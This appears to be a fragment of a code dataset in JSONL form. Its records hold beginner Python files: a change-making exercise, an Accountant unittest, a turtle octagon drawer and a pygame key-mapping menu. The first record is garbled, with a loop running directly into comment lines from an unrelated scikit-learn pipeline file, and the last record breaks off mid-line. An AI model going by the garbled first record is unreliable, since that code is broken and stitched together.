+{"seq_id":"243062896","text":"N,K=map(int,input().strip().split())\n\nc=0\nfor n in range(1,N+1):\n if n>K:\n c+=1/N\n else:\n cnt=0\n while n : 1.0\n# MinMaxScaler() : 1.0\n# StandardScaler() : 1.0\n# StandardScaler() : 1.0","sub_path":"AI/ml/m16_pipeline_RS3_wine.py","file_name":"m16_pipeline_RS3_wine.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"45448592","text":"\"\"\"Indique como um troco deve ser dado utilizando-se um número mínimo de notas. Seu\nalgoritmo deve ler o valor da conta a ser paga e o valor do pagamento efetuado desprezando\nos centavos. Suponha que as notas para troco sejam as de 50, 20, 10, 5, 2 e 1 reais, e que\nnenhuma delas esteja em falta no caixa.\"\"\"\n\ndef troco(conta_paga, pagamento):\n\tnotas = {'50': 0, '20':0, '10':0, '5':0, '2':0, '1':0}\n\tresto = pagamento - conta_paga\n\tif(conta_paga == pagamento):\n\t\tprint('Não há troco. Pagamento efetuado corretamente.')\n\telif (conta_paga > pagamento):\n\t\tprint('Ainda faltam '+str(resto)+' reais a serem pagos.')\n\telse:\n\t\twhile resto > 0:\n\t\t\tif resto >= 50:\n\t\t\t\tresto -= 50\n\t\t\t\tnotas['50'] += 1\n\t\t\telif resto >= 20:\n\t\t\t\tresto -= 20\n\t\t\t\tnotas['20'] += 1\n\t\t\telif resto >= 10:\n\t\t\t\tresto -= 10\n\t\t\t\tnotas['10'] += 1\n\t\t\telif resto >= 5:\n\t\t\t\tresto -= 5\n\t\t\t\tnotas['5'] += 1\n\t\t\telif resto >= 2:\n\t\t\t\tresto -= 2\n\t\t\t\tnotas['2'] += 1\n\t\t\telse:\n\t\t\t\tresto -= 1\n\t\t\t\tnotas['1'] += 1\n\t\tprint(notas)\n\ntroco(351, 1000)","sub_path":"Lista-03/exec03b-02.py","file_name":"exec03b-02.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"318384499","text":"#unittest\n#Using setUp() to support multiple tests\n#The instance self.acc can be used in each new test.\nimport unittest\nfrom accountant import Accountant\nclass TestAccountant(unittest.TestCase):\n \"\"\"Tests for the class Accountant.\"\"\"\n def setUp(self):\n self.acc = Accountant()\n def test_initial_balance(self):\n # Default balance should be 0.\n self.assertEqual(self.acc.balance, 0)\n # Test non-default balance.\n acc = Accountant(100)\n self.assertEqual(acc.balance, 100)\n def test_deposit(self):\n # Test single deposit.\n self.acc.deposit(100)\n self.assertEqual(self.acc.balance, 100)\n # Test multiple deposits.\n self.acc.deposit(100)\n self.acc.deposit(100)\n self.assertEqual(self.acc.balance, 300)\n def test_withdrawal(self):\n # Test single withdrawal.\n self.acc.deposit(1000)\n self.acc.withdraw(100)\n self.assertEqual(self.acc.balance, 900)\nunittest.main()","sub_path":"Py/begginer/p16_4.py","file_name":"p16_4.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"598322251","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# License : GNU GPL v3 or later\n# Author : Aurélien DESBRIERES\n# Mail : aurelien@hackers.camp\n# Project : Octo Multi Turtle\n# Created on : Sat Nov 22 07:49:46 2014\n#\n# Write with Emacs-Nox\n#\n# References\n#\n# python3 env\n# octo turtle\n#\n# Course material\n#\n# MOOC INRIA Turtle - WWW - pydoc\n#\n\n\n# we need the turtle module\nimport turtle\n\n# avoid calling range for each square\nsides = ['east', 'north-east', 'north', 'south-west', 'west', 'south-est', 'south', 'south-west']\n\ndef octo(the_turtle, length):\n \"have the turtle draw a octo of side \"\n for side in sides:\n the_turtle.forward(length)\n the_turtle.left(45)\n\n# initialize\nwindow = turtle.Screen()\nwindow.title(\"Caroline, Chloe && Bob\")\n\n# create first turtle\ncaroline = turtle.Turtle()\ncaroline.color(\"hotpink\")\ncaroline.reset()\n\n# second turtle\nchloe = turtle.Turtle()\nchloe.color(\"lightgreen\")\nchloe.reset()\n\n# create third turtle\nbob = turtle.Turtle()\nbob.color(\"blue\")\nbob.reset()\n\n# alternate : turtle, twist and octo size\ncontexts = ((caroline, 15, 100, ),\n (chloe, 60, 30 ),\n (bob, 40, 60 ),\n )\n# initialize alternating contexts\ncycle = len(contexts)\ncounter = -1\n\n# the callback triggered when a user clicks in x,y\ndef clicked(x, y):\n global counter\n counter += 1\n # alternate between the various contexts\n (turtle, twist, size) = contexts[counter % cycle]\n turtle.penup()\n turtle.goto(x, y)\n turtle.pendown()\n turtle.left(twist)\n octo(turtle, size)\n\n# arm callback\nturtle.onscreenclick(clicked)\n\n# user can quit by typing 'q'\nturtle.onkey(turtle.bye, 'q')\nturtle.listen()\n\n# read & dispatch events\nturtle.mainloop()\n","sub_path":"Octo3MultiTurtle.py","file_name":"Octo3MultiTurtle.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"644237829","text":"\"\"\"\nThis module implements functionality that allows user to view and change key mappings\n\"\"\"\n__author__ = 'Tomasz Rzepka'\nimport pygame\nfrom framework.state import State\nfrom pybomberman.menu import Item\nfrom pybomberman.configuration import configuration\nfrom framework import state_manager\n\nBLACK = (0, 0, 0)\nCRIMSON = (220, 20, 60)\npygame.init()\n\n\nclass KeyConfigState(State):\n \"\"\" This class implements State that allows user to view and change key mappings \"\"\"\n def __init__(self, width, height):\n self.width = width/2\n self.height = height/2\n self.current_player = 0\n self.selecting_key = False\n option_functions = (('Player <%d> keys' % (self.current_player+1),\n self.change_current_player),\n ('Action: ' +\n pygame.key.name(configuration.player_key_configs[self.current_player]\n .action), self.select_key),\n ('Up key: ' +\n pygame.key.name(configuration.player_key_configs[self.current_player]\n .up), self.select_key),\n ('Down key: ' +\n pygame.key.name(configuration.player_key_configs[self.current_player]\n .down), self.select_key),\n ('Left key: ' +\n pygame.key.name(configuration.player_key_configs[self.current_player]\n .left), self.select_key),\n ('Right key: ' +\n pygame.key.name(configuration.player_key_configs[self.current_player]\n .right), self.select_key),\n ('Go Back', state_manager.pop))\n self.items = []\n for i, item in enumerate(option_functions):\n self.items.append(Item(item, size=35))\n self.selected = 0\n\n for i, menu_item in enumerate(self.items):\n height = menu_item.height * len(self.items)\n if i == 0 or i == len(self.items)-1:\n x_coordinate = self.width - menu_item.width / 2\n else:\n x_coordinate = self.width - 200\n y_coordinate = self.height/2 - height/2 + i*2 + 2*i * menu_item.height\n menu_item.set_position(x_coordinate, y_coordinate)\n\n def select_key(self):\n \"\"\" Prepares key for new mapping \"\"\"\n self.items[self.selected].text = self.items[self.selected].text.rsplit(':', 1)[0]\n self.items[self.selected].text += \":